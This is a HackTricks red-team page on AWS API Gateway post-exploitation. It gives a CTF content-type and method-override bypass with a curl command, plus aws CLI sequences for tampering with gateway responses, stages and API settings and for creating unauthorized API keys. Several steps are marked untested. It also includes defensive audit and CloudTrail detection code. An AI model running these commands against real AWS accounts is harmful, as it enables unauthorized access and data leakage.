{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
For more information check:
{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} aws-api-gateway-enum.md {% endcontent-ref %}
You can create an endpoint in https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint with the service com.amazonaws.us-east-1.execute-api, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.
Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.
This technique was found in this CTF writeup.
As indicated in the AWS documentation in the PassthroughBehavior section, the default value WHEN_NO_MATCH passes the request body to the back end with no transformation whenever the Content-Type header of the request doesn't match any of the defined mapping templates.
Therefore, in the CTF the API Gateway had an integration template that was preventing the flag from being exfiltrated in a response when a request was sent with Content-Type: application/json:
{% code overflow="wrap" %}
RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
{% endcode %}
However, sending a request with Content-Type: text/json bypassed that filter, since no template matched that content type and the body was passed through unmodified.
Finally, as the API Gateway was only allowing GET and OPTIONS, it was possible to send an arbitrary DynamoDB query without any limit by sending a POST request with the query in the body and using the header X-HTTP-Method-Override: GET:
{% code overflow="wrap" %}
curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
{% endcode %}
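To make the passthrough semantics above concrete from the defender's side, here is an added example (not code from the page, the CTF or AWS) that models the three passthroughBehavior values as a decision function and uses it to audit an integration description shaped like the output of `aws apigateway get-integration`. The decision table follows the AWS "Integration passthrough behaviors" documentation; the sample integration is constructed from the page's template, and stripping media-type parameters before matching is an assumption of this model.

```python
"""Model of API Gateway request-integration passthrough behaviour plus an
audit helper. Added example; not code from the page or from AWS."""
from typing import Dict, List, Optional

MAPPED = "MAPPED"            # a mapping template rewrites the body
PASSTHROUGH = "PASSTHROUGH"  # the body reaches the backend unmodified
REJECT = "REJECT"            # API Gateway answers 415 Unsupported Media Type


def normalize_content_type(content_type: Optional[str]) -> str:
    """A missing Content-Type header is treated as application/json.
    Assumption of this model: media-type parameters such as '; charset=utf-8'
    are ignored when matching template keys."""
    if not content_type or not content_type.strip():
        return "application/json"
    return content_type.split(";", 1)[0].strip().lower()


def resolve_passthrough(passthrough_behavior: str,
                        request_templates: Dict[str, str],
                        content_type: Optional[str]) -> str:
    """Decide what API Gateway does with the request body."""
    behavior = (passthrough_behavior or "WHEN_NO_MATCH").upper()
    templates = {k.lower(): v for k, v in (request_templates or {}).items()}
    media_type = normalize_content_type(content_type)

    if media_type in templates:
        return MAPPED                      # a matching template always wins
    if behavior == "WHEN_NO_MATCH":
        return PASSTHROUGH                 # the CTF case: text/json skips the template
    if behavior == "WHEN_NO_TEMPLATES":
        return PASSTHROUGH if not templates else REJECT
    if behavior == "NEVER":
        return REJECT
    raise ValueError(f"unknown passthroughBehavior: {passthrough_behavior}")


def audit_integration(integration: dict) -> List[str]:
    """Flag an integration (dict shaped like `get-integration` output) whose
    mapping templates can be sidestepped by an unmatched Content-Type."""
    findings: List[str] = []
    behavior = integration.get("passthroughBehavior", "WHEN_NO_MATCH")
    templates = integration.get("requestTemplates") or {}
    if templates and resolve_passthrough(behavior, templates, "text/json") == PASSTHROUGH:
        findings.append(
            f"passthroughBehavior={behavior} with templates for {sorted(templates)}: "
            "an unmatched Content-Type reaches the backend unmapped; "
            "set passthroughBehavior to NEVER")
    if integration.get("type") == "AWS" and not templates and behavior.upper() != "NEVER":
        findings.append("AWS service integration without request templates: "
                        "the client body is forwarded verbatim to the service API")
    return findings


# Constructed sample modelled on the page's CTF integration (not real output).
CTF_TEMPLATES = {
    "application/json": '{"TableName":"Movies","FilterExpression":'
                        '"not contains(#description, :flagstring)"}'
}
CTF_INTEGRATION = {
    "type": "AWS",
    "passthroughBehavior": "WHEN_NO_MATCH",
    "requestTemplates": CTF_TEMPLATES,
}
HARDENED_INTEGRATION = {**CTF_INTEGRATION, "passthroughBehavior": "NEVER"}

if __name__ == "__main__":
    for ct in ("application/json", "text/json", None):
        print(ct, "->", resolve_passthrough("WHEN_NO_MATCH", CTF_TEMPLATES, ct))
    print(audit_integration(CTF_INTEGRATION))
    print(audit_integration(HARDENED_INTEGRATION))
```

The audit probes the integration with text/json, exactly the content type used in the writeup; setting passthroughBehavior to NEVER makes API Gateway answer 415 for anything the templates don't cover, which is the fix the CTF integration was missing.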
In the Enumeration section you can see how to obtain the usage plan of the keys. If you have the key and it's limited to X usages per month, you could just use it and cause a DoS.
The API key just needs to be included in an HTTP header called x-api-key.
An attacker with the permissions apigateway:UpdateGatewayResponse and apigateway:CreateDeployment can modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts.
{% code overflow="wrap" %}
API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"
# Update the Gateway Response. JSON patch syntax is used because the value contains
# commas (which break the shorthand syntax) and it is single-quoted so the shell
# does not expand $context.error.message before the CLI sees it.
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations '[{"op":"replace","path":"/responseTemplates/application~1json","value":"{\"message\":\"$context.error.message\",\"malicious_header\":\"malicious_value\"}"}]'
# Create a deployment so the modified response goes live in the stage
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
{% endcode %}
Potential Impact: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
{% hint style="info" %} Need testing {% endhint %}
An attacker with the permissions apigateway:UpdateStage and apigateway:CreateDeployment can modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data.
{% code overflow="wrap" %}
API_ID="your-api-id"
STAGE_NAME="Prod"
# Update the API Gateway stage (each patch operation is a separate space-separated
# shorthand structure; joining them with commas yields one malformed operation)
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true op=replace,path=/cacheClusterSize,value=0.5
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
{% endcode %}
Potential Impact: Unauthorized access to cached data, disrupting or intercepting API traffic.
{% hint style="info" %} Need testing {% endhint %}
An attacker with the permissions apigateway:PutMethodResponse and apigateway:CreateDeployment can modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts.
{% code overflow="wrap" %}
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"
# Update the method response. Declaring a header here only makes it available in the
# method response; its actual value comes from the integration response mapping
# (put-integration-response --response-parameters).
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
{% endcode %}
Potential Impact: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
{% hint style="info" %} Need testing {% endhint %}
An attacker with the permissions apigateway:UpdateRestApi and apigateway:CreateDeployment can modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API.
{% code overflow="wrap" %}
API_ID="your-api-id"
# Update the REST API settings (separate patch operations are space-separated).
# Note: /minimumTlsVersion is not among the documented update-rest-api patch paths;
# the TLS policy lives on custom domain names (update-domain-name, /securityPolicy).
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value=TLS_1.0 op=replace,path=/apiKeySource,value=AUTHORIZER
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
{% endcode %}
Potential Impact: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.
{% hint style="info" %} Need testing {% endhint %}
apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey
An attacker with permissions apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, and apigateway:CreateUsagePlanKey can create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs.
{% code overflow="wrap" %}
API_ID="your-api-id"
# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
# Create a new usage plan. A key is only accepted by the API stages attached to its
# usage plan, so the plan must reference the target API and stage.
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --api-stages apiId=$API_ID,stage=Prod --output text --query 'id')
# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
{% endcode %}
Potential Impact: Unauthorized access to API resources, bypassing security controls.
{% hint style="info" %} Need testing {% endhint %}
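Every technique in the sections above (modifying gateway responses, stages, method responses or REST API settings, then deploying; creating API keys and usage plans) is a control-plane call that CloudTrail records under eventSource apigateway.amazonaws.com. As an added example, not code from the page, the following detection scans CloudTrail records for those calls made by principals outside an allowlist and correlates a configuration change with a CreateDeployment on the same REST API within a time window, which is the moment the change actually goes live. The records, account id, principal ARNs and REST API id are constructed for the demo; the field names follow the CloudTrail record format.

```python
"""CloudTrail detection for API Gateway control-plane tampering.
Added example; records below are constructed, not real CloudTrail data."""
from datetime import datetime, timezone
from typing import Dict, Iterable, List

APIGW_SOURCE = "apigateway.amazonaws.com"

# Calls that change what a deployed API does or who may call it.
CONFIG_CHANGES = {"UpdateGatewayResponse", "UpdateStage", "PutMethodResponse",
                  "UpdateRestApi", "PutIntegration"}
KEY_CHANGES = {"CreateApiKey", "UpdateApiKey", "CreateUsagePlan", "CreateUsagePlanKey"}
DEPLOY = "CreateDeployment"
WATCHED = CONFIG_CHANGES | KEY_CHANGES | {DEPLOY}


def _ts(record: dict) -> datetime:
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_apigw_tampering(records: Iterable[dict],
                           allowed_principals: Iterable[str],
                           window_seconds: int = 900) -> List[Dict]:
    """Return findings for API Gateway changes by unexpected principals, and for
    such changes that were deployed (made live) within window_seconds."""
    allowed = set(allowed_principals)
    events = sorted((r for r in records if r.get("eventSource") == APIGW_SOURCE), key=_ts)
    findings: List[Dict] = []
    pending: Dict[str, dict] = {}  # restApiId -> last unexpected config change

    for ev in events:
        name = ev.get("eventName", "")
        arn = (ev.get("userIdentity") or {}).get("arn", "<unknown>")
        api_id = (ev.get("requestParameters") or {}).get("restApiId")
        unexpected = arn not in allowed

        if name in WATCHED and unexpected:
            findings.append({"rule": "unexpected-principal", "event": name,
                             "principal": arn, "restApiId": api_id, "time": ev["eventTime"]})
        if name in CONFIG_CHANGES and unexpected:
            pending[api_id] = ev
        elif name == DEPLOY and api_id in pending:
            change = pending.pop(api_id)
            delta = (_ts(ev) - _ts(change)).total_seconds()
            if delta <= window_seconds:
                findings.append({"rule": "change-went-live",
                                 "event": f"{change['eventName']}->{DEPLOY}",
                                 "principal": arn, "restApiId": api_id, "seconds": delta})
    return findings


# Constructed sample records (hypothetical account, principals and API id).
BAD = "arn:aws:iam::111122223333:user/compromised-dev"
CI = "arn:aws:iam::111122223333:role/ci-deploy"
SAMPLE_RECORDS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": APIGW_SOURCE,
     "eventName": "UpdateGatewayResponse", "userIdentity": {"arn": BAD},
     "requestParameters": {"restApiId": "abc123", "responseType": "DEFAULT_4XX"}},
    {"eventTime": "2024-01-01T10:02:30Z", "eventSource": APIGW_SOURCE,
     "eventName": "CreateDeployment", "userIdentity": {"arn": BAD},
     "requestParameters": {"restApiId": "abc123", "stageName": "Prod"}},
    {"eventTime": "2024-01-01T11:00:00Z", "eventSource": APIGW_SOURCE,
     "eventName": "UpdateStage", "userIdentity": {"arn": CI},
     "requestParameters": {"restApiId": "abc123", "stageName": "Prod"}},
    {"eventTime": "2024-01-01T12:00:00Z", "eventSource": APIGW_SOURCE,
     "eventName": "CreateApiKey", "userIdentity": {"arn": BAD},
     "requestParameters": {"enabled": True}},
    {"eventTime": "2024-01-01T12:05:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutObject", "userIdentity": {"arn": BAD},
     "requestParameters": {"bucketName": "unrelated"}},
]


def demo() -> List[Dict]:
    """Run the detection over the constructed records with only the CI role allowed."""
    return detect_apigw_tampering(SAMPLE_RECORDS, [CI])


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

In practice the allowlist is the set of pipeline roles that are supposed to deploy APIs; any CreateDeployment by a human principal shortly after one of the configuration calls above is worth a look, and the x-api-key and usage-plan events are the signal for the key-creation technique described in the last section.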